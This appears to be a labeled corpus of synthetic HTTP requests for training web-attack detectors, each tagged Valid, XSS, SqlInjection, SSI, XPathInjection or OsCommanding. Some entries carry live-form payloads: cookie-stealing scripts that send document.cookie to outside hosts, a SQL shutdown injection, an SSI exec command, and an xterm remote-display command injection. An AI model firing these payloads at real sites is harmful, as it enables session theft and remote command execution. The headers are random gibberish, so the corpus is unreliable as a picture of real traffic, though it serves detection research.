End - Id: 18658
Start - Id: 421
class: Valid
GET /domiNbwodvleeit/dmr65a/qaausl6scTse7dtkiTnt/sZ3WBP.n-004/33BmI/b1/ReaEW/6.at2wzHHjuAoRZ/k3F8YHdue4/hgay5/8hM7swreklt5qhg.sh?3bhfnclie=8971352&ie=Nct&oragtdDyaaPna9=dT4irfrnneeunc9Ad HTTP/1.1
Host: www.uLxes1c.st:1
Connection: keep-alive
Accept: text/*;q=0.7, audio/*;q=0.6
Accept-Charset: euc-cn, x-mac-icelandic, windows-1255, windows-874
Accept-Encoding: 
Accept-Language: ahoecrut-gazaoh;q=0.2, en-u
Cache-Control: max-stale
Client-ip: 167.5.228.211
Cookie: 13iYv6ELR=h
Cookie2: $Version="17"
Date: Tue, 08 Jul 08 11:04:58 CET
ETag: "S0COAidTeioOfvMcFn0"
Expect: vtwsoGy=cos23
From: enIsusc@saoftwhhea.net
If-Modified-Since: Tue, 15 Sep 09 15:59:49 UTC
If-Unmodified-Since: Tue, 07 Feb 06 22:08:12 UTC
If-Match: "wgXFZ02@LKHzvr04aWf"
If-None-Match: "nsmnMJYKNdJbORJsZ"
If-Range: Sat, 20 Aug 05 08:56:22 UTC
Max-Forwards: 744
MIME-Version: 5.2
Pragma: tfY='i'
Proxy-Authorization: 6nlOpg rtnm=stbdwR
Authorization: Basic dHdlZXU6bjZhY1NhOXQ=
Range: 95586-,-851,-5894
Referer: /tstm/empie/ielo/Talb.tar.gz
TE: gzip,trailers,deflate;q=0.6
Trailer: Trailer
User-Agent: Mozilla/6.5 (Machintosh; U; PPC 4.7; ts-hE; rv:5.4.4) Gecko/94190375
UA-CPU: Sparc
UA-Disp: 810,8513,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7545x2141
Via: saht/3.7 www.imy0tpsi.htm, 2.4 110.6.142.59
Transfer-Encoding: gzip
Upgrade: h8v/5.8, rdh/0.4, hph/9.9, 1sOa/3.6, nneh/1.1
Warning: 149 17.234.227.54 "dtnns1r5ttEtxenr" "Tue, 03 Jan 06 20:04:52 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 5470041402
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 421
Start - Id: 46772
class: XSS
PUT /nW1Ghv_ttQxobjectn5V/Ytmp3y/mttstOtzSrthiEaBiere/e0N/eiUzoVgQets/HFhomeFZvf-bxterme/so/iframeH2iJH/jzd1ZS2hg/G9nGn/EJ.css? HTTP/1.0
Content-Length: 388
Content-Language: kl1btOix
Content-Encoding: identity
Content-Location: http://www.o9rne.com/rc0dN/2fhsi4d/drenbt.aspx
Content-MD5: bmF0ZW5yZTZyaTZpRGF3RA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Dec 08 15:55:08 GMT
Last-Modified: Thu, 08 Mar 07 09:04:57 GMT
Host: www.gindhuse.cz:80
Connection: rmaste
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: identity, identity, gzip
Accept-Language: raXi-haereyp, 9osdE-vioe;q=0.6, ueabt-gitrVe4o;q=0.7, r3narH-leylse;q=0.8
Cache-Control: 8hctu='iEteaO'
Client-ip: 19.200.37.172
Cookie: ielSyYRCseeeal=ropt
Cookie2: $Version="208"
Date: Sat, 28 Nov 09 22:19:11 CET
ETag: W/"45M3KI-DcdUxGVMkKvjw"
Expect: pnwtm=hnizs
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 22 May 08 06:18:58 UTC
If-Unmodified-Since: Thu, 08 Dec 05 08:17:29 UTC
If-Match: *
If-None-Match: "-BgwL8a8s9uvj2RS"
If-Range: "iDGLXhjkjg.ZIa96k"
Max-Forwards: 8
MIME-Version: 7.2
Pragma: lilA=orelE4Tr
Proxy-Authorization: o1svi Elj40=bhoesO1
Authorization: Digest uri=/aL4oa3dk/aIef.tar
Range: 462-
Referer: http://www.oiotO.uk/hie9S/oefab/einliti/fybetias/egtp2rq.cfm
TE: chunked,trailers,trailers
User-Agent: Mozilla/2.0 (compatible; Konqueror/1.1; Linux i386; isaest; reanseti; t2ft84ow)
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.3 www.Edityfik.js, Ar9s/1.7 90.180.35.219, 7.8 www.a4Ieoorn.jpg
Transfer-Encoding: srds
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 183.74.153.68
X-Serial-Number: 4765773
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9eeoioerapcn=cpzET-v67&himedPPh=257&mszad8p=enlti&uC&xtermDNRTc1jftmpw=passthrubfH&etintcdilhoh=wrMA&3K.3org8Z=tPsHS9I7Ka&antytp1ai=<<script    >[document.location.replace  ('http://www.meremane.com/cgi-bin/gentnden.cgi'+document.cookie);]</script  >&tlsr='tUarey&ntmetc48nosu=ortmpza&hene8sa10ul=we locationpassthruatebt&spb7ob3tscsitcn=eEhi @

End - Id: 46772
Start - Id: 3779
class: Valid
GET /XbxDUXVVq/9ypEbr2ryul3/zstfmhia1e.php4?do=36&hrnamdaa=604&dXmdtpqK=ix8Ue7&buehOegnenico=81755640&ntYlktnynntlpe=npcsasf9a&2taaleftsir=r%7Enodeit&pnwe=s1gxtuatio&SgE8lc6wa=06982 HTTP/1.1
Host: 136.10.34.163
Connection: 4Xric
Accept: audio/basic
Accept-Charset: windows-1250;q=0.7, iso-8859-2, iso-8859-8, iso-8859-8
Accept-Encoding: deflate, deflate;q=0.8, deflate;q=0.4
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 235.59.125.79
Cookie: 4iaig2iotdol=fX@;_icmdMsb=hrp oc:2h;boit8ihrA9t4t9n=2;uIczU2zbodytb=070168969;passwdov4sam=ruXyt
Cookie2: $Version="0"
Date: Wed, 18 Feb 04 14:37:58 GMT
ETag: W/"Cw5CBzPYBcAwz@Gj"
Expect: msle9rna=tnnrdc
From: ueatims@oatosfu.net
If-Modified-Since: Mon, 09 Feb 09 12:25:50 CET
If-Unmodified-Since: Tue, 27 Sep 05 11:21:23 CET
If-Match: *
If-None-Match: "bbZx2oU-aJDAP4KV"
If-Range: Sat, 30 Aug 08 04:30:19 UTC
Max-Forwards: 3
MIME-Version: 4.3
Pragma: hc='tenk'
Proxy-Authorization: Basic Y3NuY2Rlb2o6b3lzNW0=
Authorization: Digest cnonce="ltztH"
Range: -60328,-3384,331-
Referer: /eextrtoI.cfm
TE: trailers
Trailer: Transfer-Encoding
User-Agent: emegehee (amlFvXL; rI8vjSn)
UA-CPU: PowerPC
UA-Disp: 599,9039,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0475x7705
Via: 8.6 7.92.49.237, 4.2 www.rtke.css
Transfer-Encoding: gzip
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 034 234.86.11.26 "CauegTgiutt0" 
X-Forwarded-For: 10.116.47.222
X-Serial-Number: 68867877
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3779
Start - Id: 41857
class: SqlInjection
GET /IU.js?gogm5z6Kae=31&_LC4s=8635604477&nnechec=Rhgef&abQK=3668625&tz=bgsoundMma+&f@Fn=aO+c%27&Em=ew6SVGh5n1N&nc4orer=%27%3B+++++shutdown--&hnnrim=bs9&prru6=n%3D6r&rymnWbos=817522&Kpa9.2.u0w=vacavld6%24&bdThtijed=nr%40uSdz HTTP/1.1
Host: www.awo4ae1su.com
Connection: keep-alive
Accept: audio/x-wav;q=0.6, application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 252.39.167.36
Cookie: uhtpRHir=yswi]isr;iAsz9iBotptniwe=1eucfo9gitia;EWosi3ny6nZ=e7-E6Ztckz;noHh7cb8ctqa=58889;uttm8iihO=icTV1H
Cookie2: $Version="72"
Date: Thu, 30 Nov 06 14:21:59 GMT
ETag: "a2V9IycN6MWKRF29Nv"
Expect: rpih
From: hth8n7i@4gf4.de
If-Modified-Since: Fri, 04 Dec 09 20:35:33 UTC
If-Unmodified-Since: Sat, 17 Jul 04 03:06:19 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 07 Mar 07 08:52:10 GMT
Max-Forwards: 7325
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: 9e2te epmr=aedBepse
Authorization: Basic ZXJlT2Q5OmUwaXZkc3Nl
Range: -521,-331719
Referer: http://BvnD.com/pirhag.ace
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 5.4; ey-eo; rv:7.8.7) Gecko/02693903
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: 0.9 70.225.13.111
Transfer-Encoding: gzip
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 532 103.218.114.157 "eqF8dbfeC" "Sat, 29 Jan 05 05:14:55 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 10397953831192510
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41857
Start - Id: 40045
class: SSI
GET /rsweh/4rjQpf.boot.inibgsound658eIj/WDcVwbodyperlBO645/4wc/sjXN4luyjQLVZ1We/8LwU0K.C/yshati9Iiwepe1sot.css?glmokpfrre=7362948179&vdetwoLsknxs=4&lenot6tbtfe=rtoichei9or%3A&.QJDc=h7pwnupt&tipa5mEdgtUnrc=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fls++++-l+++++%2Fhome%2Fte%2FneaiM3%22+++++--%3E&hseinfeensae=112&ps=%5DOar0ore+6T&tiamJi=8rayfuaselect0t9IrZD HTTP/1.1
Host: www.engohuHyom.net
Connection: c33dde5
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.7, windows-1251, windows-1257
Accept-Encoding: 
Accept-Language: bSow-intnc;q=0.2, asaaiomo-c;q=0.6, ufPepa-ituPre;q=0.3, e-nyaar8;q=0.8, snh8eEPu-ttAzt;q=0.7
Cache-Control: max-age=621
Client-ip: 216.42.174.149
Cookie: .20connect=tnTM5hQ;azpbeo=345;eqa=mstK7
Cookie2: $Version="5"
Date: Tue, 12 Jun 07 06:42:30 UTC
ETag: "xJcfFu.TQv6CMJdq7b"
Expect: 100-continue
From: itso@s0eeosrw.st
If-Modified-Since: Wed, 16 Jun 04 05:04:18 GMT
If-Unmodified-Since: Mon, 22 Aug 05 06:58:36 UTC
If-Match: "LWo9BJHNxuKpxacg"
If-None-Match: "KnWoln-23GKyk2Zw"
If-Range: Mon, 19 Feb 07 15:09:41 CET
Max-Forwards: 787
MIME-Version: 7.2
Pragma: a1Iinlh='sytf6P'
Proxy-Authorization: Basic ZmhsdDp1YWx0ZQ==
Authorization: NTLM ZW8xRXdoclVpaWFldWxzbnRoZW5UZW9TdzVzb3J2b2Vpbm9zZGk2ZUU=
Range: 92956-
Referer: http://hRctxit.org/hK5d/liim/hl3peo/hGdei.dll
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/4.1 (X11; U; SunOS sun4u 2.3; Xa-1d; rv:1.9.0) Gecko/56555867
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: HTTP/1.3 www.AhOb.gif, 7.2 60.37.146.74, 9.5 15.57.138.92:71128
Transfer-Encoding: compress
Upgrade: Reeanu/6.7, rten/3.6, tdg/3.6
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 02001
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40045
Start - Id: 48905
class: XPathInjection
GET /ikoaHeaCeoie/pcdzhzRuX6c/eontkr/oWelr4lsg5ae.sh?inre=eeoasnngaogsryllaN&tair5hoaewetr0p=1753&6mnehyeeiikru=mailD%26r6slikeV%40&snIchaate4faN=lBe1teasa8cCd&c1Shhtdysptnnhh=%5B%3D%27%2FilveoOpassthrufromaopt&irelhrsnT=Ntup7n&rNk2Mr2t=eyaccepteIcatnu+2&9tn3c=2632318&cfbhngabreq=413931&btAbj=717&he8o=oe%27+++or++1%3C+++dia8lN%2FSe%2FTlnza%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D6%5D+or+++%27Sttntte%27++++%3D+%27 HTTP/1.1
Host: 236.39.132.206
Connection: easgei
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesetrad;q=0.1, iso-8859-6, iso-8859-5;q=0.6, windows-874
Accept-Encoding: 
Accept-Language: wt-ugr80k9, 8b84ui-asuns4IA, lpes4NSC-iewtcs;q=0.2
Cache-Control: only-if-cached
Client-ip: 115.108.162.213
Cookie: rae=enLnode;tnr0aigtaetxcLe=7182;anfdtheL7A='t ;BcbSOlre4roS4i=2900
Cookie2: $Version="0"
Date: Sun, 29 Jul 07 11:51:16 UTC
ETag: "WYNhh.HkA-GnzCFmx"
Expect: bnte
From: nui8@hgERemx.net
If-Modified-Since: Sat, 03 Jun 06 15:17:23 GMT
If-Unmodified-Since: Wed, 07 Apr 04 05:57:53 CET
If-Match: "T@_sxNfq59Hr3pi"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic blRlaDBtazp0eGVrcDBpNg==
Authorization: NTLM ZWhlbWdiaWh0cWh4YWs5ZWVvOWVwcmR0YTBOdHkzZXQ1M2Vjcm9uQ2g4
Range: 87-22
Referer: http://ze4olw.de/reo7fid/neson/rndgP/qrrhEhOu/wgqEaas.cfm
TE: trailers,gzip;q=0.7
Trailer: Warning
User-Agent: Mozilla/2.9 (X11; U; Linux i586 5.3; en-rS; rv:7.0.0) Gecko/70099342
UA-CPU: MIPS
UA-Disp: 8730,583,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 978x515
Via: FTP/5.6 209.101.34.97:58625, 7.8 36.246.113.99, 1.9 www.wonipier.html
Transfer-Encoding: compress
Upgrade: ltr/8.5, jsTkgd/0.2
Warning: 099 www.eSitghtc.htm "2nttveexd" "Tue, 21 Sep 04 15:34:20 CET"
X-Forwarded-For: 1.220.148.94
X-Serial-Number: 58510218762
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48905
Start - Id: 46698
class: XSS
GET /ngBHCF8/sP9HGvKy1/ewIuwxTeeee1mi/Iarhmssetmrsehm/o_N9DwP4mEQZ1x1ofk/gabtnsngdse9al/UXY.jpeg?acarieahe3na=82&UnSdFWDv7=ue+passwd%2Fsystemwgeth2nodeftp&thpoaawDrPoaf=tootne3dja&esugqt7t8one=91622577 HTTP/1.0
Host: 156.19.149.116:2
Connection: close
Accept: */*
Accept-Charset: iso-8859-4, iso-8859-5, windows-1254;q=0.7, windows-1255;q=0.3
Accept-Encoding: deflate, gzip;q=0.3
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 36.116.63.20
Cookie: AGUMRW8=<link rel =    "   stylesheet  "   href    =  "    javascript:[document.location.replace('http://www.ntvetr.com/cgi-bin/es.cgi'+document.cookie);]     "   >
Cookie2: $Version="000"
Date: Thu, 26 Oct 06 17:17:46 UTC
ETag: W/"3YOmHV2S11fnMGrArt"
Expect: 100-continue
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Wed, 15 Feb 06 14:18:24 UTC
If-Unmodified-Since: Tue, 07 Oct 08 14:44:24 UTC
If-Match: *
If-None-Match: *
If-Range: "EZIVtdbFAq@lv1Sw"
Max-Forwards: 116
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: ttnoUO ieSeltd=irDSbek
Authorization: Digest nc=6c24f78a
Range: 217332-
Referer: /r7ccerdb/aofesor/9rglotww.mpg
TE: trailers
Trailer: If-Match
User-Agent: tk8sWaRD http://www.cd4iW.org
UA-Disp: 733,0312,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 007x164
Via: 9.2 162.209.185.141, 8.5 www.tFnnee.css
Transfer-Encoding: oaao
Upgrade: oa7ner/6.8, tdsyot/0.1, lom/8.5
Warning: 905 www.seauzsf.jpeg "Tdiereitiwn54deIa" 
X-Forwarded-For: 254.88.178.244
X-Serial-Number: 9170068717
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46698
Start - Id: 8277
class: Valid
GET /a_4ZCtk.6F3Ago-W/3ot/oMpH658x2/t0cmeOOjEJZ.I/mVd4s/e4/r.YiTl0NvXUvn/6yrfh7lrieIs/Td5ubaey/ei/iWKo9NC2MMcB30OchH/nMyH.gif?rrpeccl=aX1eTIo&hgMVasea=fnUmG_&6f9bnXeeseg=taTWsb3&siyissnhn9ycfr=owx5gps8LXb&ebObmet=goEodybetc&ednmraredmmtd=t5.j3W HTTP/1.0
Host: www.fei0Eqt.ch
Connection: zwwsupo
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 4.247.143.148
Cookie: kamw=n 1oAxogperlphpi;mawt5ro=$ekneuatzU0;fzsaieUnzptu=945;eHeattiNar6=2=~o chiexec11\$Bz)h
Cookie2: $Version="9"
Date: Mon, 24 Jan 05 11:45:40 GMT
ETag: W/"UuoE0gx4fmHzMb.airRK"
Expect: 100-continue
From: teSs@0iptauimo.cz
If-Modified-Since: Tue, 15 Jun 04 10:30:07 UTC
If-Unmodified-Since: Wed, 06 Jan 10 17:05:33 GMT
If-Match: "UMuDh0@OVd3-6KXL"
If-None-Match: *
If-Range: "o9MHIrAJ-9wwMm-Dso9"
Max-Forwards: 29
MIME-Version: 1.1
Pragma: e1sp='AGry'
Proxy-Authorization: l6sult ptotur=gueoiO
Authorization: NTLM YnB5bm9vbWxvcnJlaHN4bzlnc2Nkbjdlc2kwZndhamFiNHBwcW1MZFVwdWNB
Range: 80929-,71055-
Referer: /Nrap.css
TE: trailers,gzip,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.9 (X11; U; Linux i586 7.0; ne-te; rv:6.2.6) Gecko/03171992
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 833x678
Via: 8.9 www.sseniFg.jpeg, FTP/0.9 www.nrd0r.htm
Transfer-Encoding: compress
Upgrade: n83/8.7, wpeioz/2.0, Rbtic5/8.3, s4h/9.8
Warning: 511 www.4eiedl.jpg "iyeseuen99unse7mytth" 
X-Forwarded-For: 180.145.13.167
X-Serial-Number: 538548
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8277
Start - Id: 24055
class: Valid
GET /thnlc/TBkphp5d7nodeuKs/objectqEnullsaVIA6dw2wb/.p/0_rq/itho/iefsmaxy6Ea.tiff?eaybsta2bet7t=d2mx&efn=150215958&1kimgpassthruw=%25enrc3nu7ur-%25&6dcnoOeesj8=81&2sii=vcB&oFRzfromZVjreplace=2rUQ5UCRc0&il=hrosar HTTP/1.1
Host: 236.44.227.196
Connection: 1D2fte
Accept: audio/*
Accept-Charset: iso-8859-4, utf-8;q=0.4, windows-1254
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 24.121.120.49
Cookie: nUtBaRrotlcKov=teaftp;whm4no2Llmasosh=qie;h1ytopXe11e=zlMwrc
Cookie2: $Version="342"
Date: Mon, 14 Dec 09 22:10:44 GMT
ETag: W/"wEVZw1PbzYmAZZFS"
Expect: 100-continue
From: fewUg9v0@yntowDa.org
If-Modified-Since: Wed, 03 Feb 10 08:48:07 GMT
If-Unmodified-Since: Sat, 14 Feb 09 22:55:39 GMT
If-Match: "PAhwi6AovXgOx@51c2L"
If-None-Match: *
If-Range: Tue, 01 Mar 05 18:15:21 GMT
Max-Forwards: 3
MIME-Version: 6.0
Pragma: d='taEarh'
Proxy-Authorization: 5pue neoh0ai=ade4maHi
Authorization: Basic cnRucWxQdVc6Z2Vjc2U=
Range: 069046-944927
Referer: /jmrshh/IrDr/hbtl/t8nait/sfde3go.bin
TE: deflate;q=0.2,chunked,gzip;q=0.2
Trailer: Pragma
User-Agent: tkamTxfi6eTbtorai
UA-CPU: x86
UA-Disp: 176,3441,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 775x0014
Via: ienaa/3.2 www.sdadyfze.shtml, 6.6 www.ueqpae.htm
Transfer-Encoding: deflate
Upgrade: mer/2.5
Warning: 652 250.250.27.45 "ucdaI7dsmtc" 
X-Forwarded-For: 240.187.200.43
X-Serial-Number: 4272941
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24055
Start - Id: 17884
class: Valid
GET /Osdj/omneni2hr/hcomeS0/smqDj/tQaue6uMI.shtml?u7asf=srrx%3Ak%40ninput%3Fdt&aHusgerAehtbmz5=eh&abbhymcs3tre=H%7Cu&URa0BPjMj4o2=49556858&4suairliwo=25&Ewr3fd=25274&AJTq-KLD=63&3yIopAe0sRi=eA7vF&eI4aPF=%3B+2ubG8r5lPand-&9Adoeoaenlottmn=64363 HTTP/1.0
Host: 96.36.109.85:80
Connection: roec
Accept: */*
Accept-Charset: iso-8859-15
Accept-Encoding: *
Accept-Language: hsdnkod4-otE;q=0.5, vsoysPs3-ci1nMeec;q=0.2
Cache-Control: max-age=923
Client-ip: 134.171.238.70
Cookie: 0dp3XKf8=d_2lhSvKX8Az;aYAtelnet=yY8CmDgA5.k
Cookie2: $Version="47"
Date: Thu, 03 Nov 05 14:26:23 UTC
ETag: "bLNGsv_WFsHfUWx1.kz_"
Expect: 100-continue
From: uicsxe@leXtsDeref.ch
If-Modified-Since: Sun, 17 Apr 05 17:45:06 CET
If-Unmodified-Since: Fri, 09 Sep 05 24:19:56 CET
If-Match: "NProhep70YgBE6sRjmXB"
If-None-Match: "HPVP1dX5ii9eI82vdDq1"
If-Range: *
Max-Forwards: 185
MIME-Version: 3.8
Pragma: te='vBsmj'
Proxy-Authorization: Digest realm
Authorization: NTLM bW44c2VHbXN1ZnNBYmVmcHhwZWRlc2FlYmxFb3lvc2hrMmVqbDF1M3JSNg==
Range: -7
Referer: /1iNsnffo/dnia3oph/Illeg/u6gdtib.bin
TE: trailers,chunked;q=0.7
Trailer: Connection
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 5.9; eo-mr; rv:8.5.8) Gecko/65492327
UA-CPU: PowerPC
UA-Disp: 929,7380,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0136x525
Via: 1.1 22.163.217.31
Transfer-Encoding: identity
Upgrade: Rhati/3.5, utw/4.6, 9reuu/0.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 223.60.103.146
X-Serial-Number: 3494344
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17884
Start - Id: 15409
class: Valid
GET /iK3a4vcmnhek5UY/dMV/pEL9l/uW227MAZiYwHt/liMmXSgGbzl1RUOXpm/yeoqwa2sgen/sc/vZVzhs3FAJ1D1oq5NR/tegtsnHmI6enhlsEea0/g169t-mTFpUF9waZHb/teIyvl/2ysztSlEGnuhoALCcX.sh? HTTP/1.1
Host: www.nAvwou.net
Connection: lnrehd
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp;q=0.7, macintosh, x-mac-japanese;q=0.4, iso-8859-8-i;q=0.2
Accept-Encoding: 
Accept-Language: C-uwy;q=0.2
Cache-Control: min-fresh=7450
Client-ip: 90.204.112.5
Cookie: FPLwsnyNz0ee=81l3;gaptmoemeESais=62917;oT8hhiSmywhcm=ncerlThomefA7priha;dSf1=aGPuLgDr;nn7aeoee=qfboZPb4Le;xsrim0=|L e
Cookie2: $Version="965"
Date: Wed, 10 Oct 07 21:19:35 GMT
ETag: "LW9tjwmUMPYn2Ai9"
Expect: 100-continue
From: hreEo@mhtthLrava.org
If-Modified-Since: Thu, 12 Jul 07 05:54:27 GMT
If-Unmodified-Since: Wed, 06 Oct 04 24:55:24 GMT
If-Match: *
If-None-Match: *
If-Range: "WA@nZ@MVBp7NvASok"
Max-Forwards: 3581
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: eeaeg nrstl=TnFalO8t
Authorization: Digest algorithm=dnoYbcg
Range: 9-62,54186-,361-
Referer: http://www.aqttHq.ch/iieycju.gif
TE: deflate,trailers,trailers
Trailer: Connection
User-Agent: aGArb3 http://www.otyi.fr
UA-CPU: 68000
UA-Disp: 8723,427,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5103x7782
Via: 0.3 www.h9Itpo.shtml, FTP/6.1 124.73.49.41, 2.2 www.q0en.html
Transfer-Encoding: compress
Upgrade: dAn/4.5, 3mn4ds/7.1, gos/5.5, zcote/1.9, sxOwze/3.3
Warning: 254 www.nm4da.htm "TP6YSIy4aedfshhw" 
X-Forwarded-For: 197.234.139.35
X-Serial-Number: 62076260376373
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15409
Start - Id: 43353
class: OsCommanding
GET /teiZadE5GludWJGVCa0.css?hv4sLhavingoPwherehRl=awlfart6iwb8o&onmafsfe=%26nc&tstfae=euelglRdc8bWsriJ&UvXallAsVM=dscript&SFoaTmWKopt=ehuSr&sthq=15073398&XheUwJPsBkP=t1ykte8vYRiaan&k8ws=%250A++++xterm+++++-display++++www.ndlias.com%3A0.0++&pDQCHaB4xR=en1iotsireiepyrvyo&dtewofrsdet=nt%26tItngllcleevalm%3CFtlocation&etsgtgxytg=50622223&ni05rdhIejg=lFHB_Bmrw&awxEqincludeK=05aIUn&baheYnsE6ce=85 HTTP/1.0
Host: 214.229.19.22:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-5, hz-gb-2312, us-ascii, windows-1252;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=79
Client-ip: 39.142.10.38
Cookie: 0ain= i7q8;pofnewtohie=inracn6yrot;98AformR=SaosAtcieuUeeoh3
Cookie2: $Version="9"
Date: Sat, 24 Jan 04 13:24:28 GMT
ETag: W/"k1P9H2sZ4nonmQR5NYQ-"
Expect: 100-continue
From: tz687o@hnoaaeiE.it
If-Modified-Since: Mon, 04 Apr 05 03:14:10 GMT
If-Unmodified-Since: Sun, 17 Oct 04 11:58:56 GMT
If-Match: *
If-None-Match: "5Xm4-j6QM8jjuTm-lF"
If-Range: Thu, 22 Oct 09 17:52:41 GMT
Max-Forwards: 40
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="faby1"
Authorization: ilfe8 aoOeoE=oetOtoI
Range: 33667-,-94
Referer: http://eectur.de/piuMMegn/5e5am8ND.msf
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/7.7 (compatible; rErifropa; Windows NT; a9elcer; ooNtdO; Osetgynsl)
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 331x628
Via: HTTP/0.0 68.201.151.85, eisdl/6.4 32.159.193.1:65006, HTTP/1.2 141.88.49.129:70
Transfer-Encoding: identity
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 476 114.93.136.20 "eSSt" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43353
Start - Id: 9900
class: Valid
GET /eC/etS/wqtTL84TW/rQDf1wvdHhPtzI/lWa-p_/Cdtnj/alroe8z83rSp/t4HPyyUwpoUFcV/Sr5D.jsp?Ttww=%3Erb8Tt%3Fe++%3D%28bgsound%3A&Op=Ieh%3Ad&xbWi4_CKc=tcnfo&temoanmToott=6&WMuieoejctlqinr=93281&udY5ZHaDJlC=434&enEa3xruuene=fmeta9 HTTP/1.0
Host: 86.73.71.222
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1251;q=0.8, iso-8859-5;q=0.6, euc-tw, cp-932
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: n=R
Client-ip: 79.46.22.252
Cookie: e0rsRehdtiuhon=87802859;srwerHueathwr=7andcmdtete;jUrb=1htpassxn ofee|Rhspa;udi=erk?w;rnph-B53qCwlY=upec5trrhedtaeb3
Cookie2: $Version="3"
Date: Wed, 15 Oct 08 12:52:06 GMT
ETag: "W1YghaQsoItNO1M"
Expect: 100-continue
From: reieurea@btrTy7r.com
If-Modified-Since: Wed, 25 Feb 09 23:17:20 GMT
If-Unmodified-Since: Tue, 17 Nov 09 10:54:08 CET
If-Match: "yQj6adJKmfmAPd6"
If-None-Match: "YiXc@jWGVi-oLJgb_ZUW"
If-Range: *
Max-Forwards: 60
MIME-Version: 5.5
Pragma: aate=op
Proxy-Authorization: Digest realm
Authorization: NTLM ZXJobjZsd3NMcnN0RWlwcG5pYWRob21lb3NubXh0b28ybnM=
Range: 3507-
Referer: http://5yrye.biz/Eiyofim/16ay2tct/alyiaue.htm
TE: gzip,trailers
Trailer: Referer
User-Agent: 6a413ew (cMFkj04a; b15F6vTY; eRSCF3)
UA-CPU: StrongARM
UA-Disp: 042,750,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 475x606
Via: FTP/7.6 www.ztdE.jpg, 6.8 129.152.215.11
Transfer-Encoding: identity
